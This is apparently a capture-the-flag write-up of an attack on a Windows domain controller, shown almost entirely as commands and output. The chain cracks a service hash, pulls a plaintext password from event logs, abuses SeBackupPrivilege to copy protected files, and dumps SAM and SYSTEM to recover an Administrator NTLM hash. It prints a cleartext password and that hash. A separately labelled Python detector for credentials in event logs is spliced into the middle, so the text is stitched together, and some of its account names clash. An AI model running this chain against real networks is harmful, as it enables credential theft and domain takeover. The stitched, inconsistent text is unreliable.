kali@kali:~$ hashcat -m 13100 hash_svc_datakeeper ~/Desktop/rockyou.txt --show

User svc_veracrypt belongs to group BUILTIN\Event Log Readers:

*Evil-WinRM* PS C:\Users\svc_datakeeper\Documents> whoami
trilocorai\svc_datakeeper
*Evil-WinRM* PS C:\Users\svc_datakeeper\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Event Log Readers                  Alias            S-1-5-32-573 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Searching for user passwords in event logs, I found the password of svc_veracrypt:

*Evil-WinRM* PS C:\Users\svc_datakeeper\Desktop> wevtutil qe Security /rd:true /f:text | Select-String "/user"

Process Command Line: "C:\Windows\system32\net.exe" use f: \\172.16.6.100\backups /user:svc_veracrypt Au10_B@ckuP_cRy3t
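The wevtutil search above works because net.exe received the password on its command line and process command-line auditing (event 4688) recorded it. The Python scanner below is an added example, not from the report: it runs the same check over constructed wevtutil /f:text output and masks whatever it finds, so the same logic can drive an alert on credential exposure instead of a harvest.

```python
import re

# Command-line shapes that carry a secret (constructed list, not exhaustive).
CRED_PATTERNS = [
    ("net use /user:", re.compile(r"/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I)),
    ("cmdkey /pass:", re.compile(r"/pass:(?P<secret>\S+)", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+['\"](?P<secret>[^'\"]+)['\"]\s+-AsPlainText", re.I)),
]

# Constructed sample in the layout of `wevtutil qe Security /rd:true /f:text`: event 0
# reproduces the finding from this report, events 1 and 2 are made up for contrast.
SAMPLE_EVENTS = r"""Event[0]:
  Log Name: Security
  Event ID: 4688
  New Process Name: C:\Windows\System32\net.exe
  Process Command Line: "C:\Windows\system32\net.exe" use f: \\172.16.6.100\backups /user:svc_veracrypt Au10_B@ckuP_cRy3t
Event[1]:
  Event ID: 4688
  Process Command Line: net use g: \\fs01\share /user:backupsvc /persistent:no
Event[2]:
  Event ID: 4688
  Process Command Line: powershell -c "$p = ConvertTo-SecureString 'Sample_P@ss1' -AsPlainText -Force"
"""


def parse_events(text):
    """Split wevtutil text output into one dict of 'Field: value' pairs per event."""
    events, current = [], None
    for line in text.splitlines():
        if line.startswith("Event["):
            current = {}
            events.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.strip().partition(":")
            current[key.strip()] = value.strip()
    return events


def find_exposed_credentials(text):
    """One finding per event whose command line carries a secret; the secret is masked."""
    findings = []
    for event in parse_events(text):
        cmd = event.get("Process Command Line", "")
        for label, pattern in CRED_PATTERNS:
            match = pattern.search(cmd)
            if not match:
                continue
            secret = match.group("secret")
            if secret.startswith(("/", "-")):  # next token is a switch: no password on the line
                continue
            findings.append({"event_id": event.get("Event ID", "?"), "pattern": label,
                             "user": match.groupdict().get("user") or "(n/a)",
                             "secret_masked": secret[:2] + "*" * (len(secret) - 2)})
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_EVENTS):
        print(f"event {f['event_id']}: {f['pattern']} user={f['user']} secret={f['secret_masked']}")
```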
User svc_veracrypt can PSRemote to DC02:

kali@kali:~$ evil-winrm -i 172.16.210.5 -u svc_veracrypt -p Au10_B@ckuP_cRy3t

User svc_veracrypt has SeBackupPrivilege, which means we can back up and access any file we desire:

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Downloading the necessary files

kali@kali:~$ wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
kali@kali:~$ wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll

Uploading to DC02

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> upload /home/kali/SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> upload /home/kali/SeBackupPrivilegeUtils.dll

Importing the DLLs

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll

Backing up flag.txt

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\flag.txt C:\Temp\flag.txt -overwrite
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> type C:\Temp\flag.txt
<SNIP>

Dumping hashes

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> cd c:\
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> mkdir Temp

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/10/2000  10:05 PM                Temp

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> cd Temp
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> download sam
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> download system

kali@kali:~$ pypykatz registry --sam sam system
<SNIP>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a678b5e7cc4c143b1d76a69ddf14c3ae:::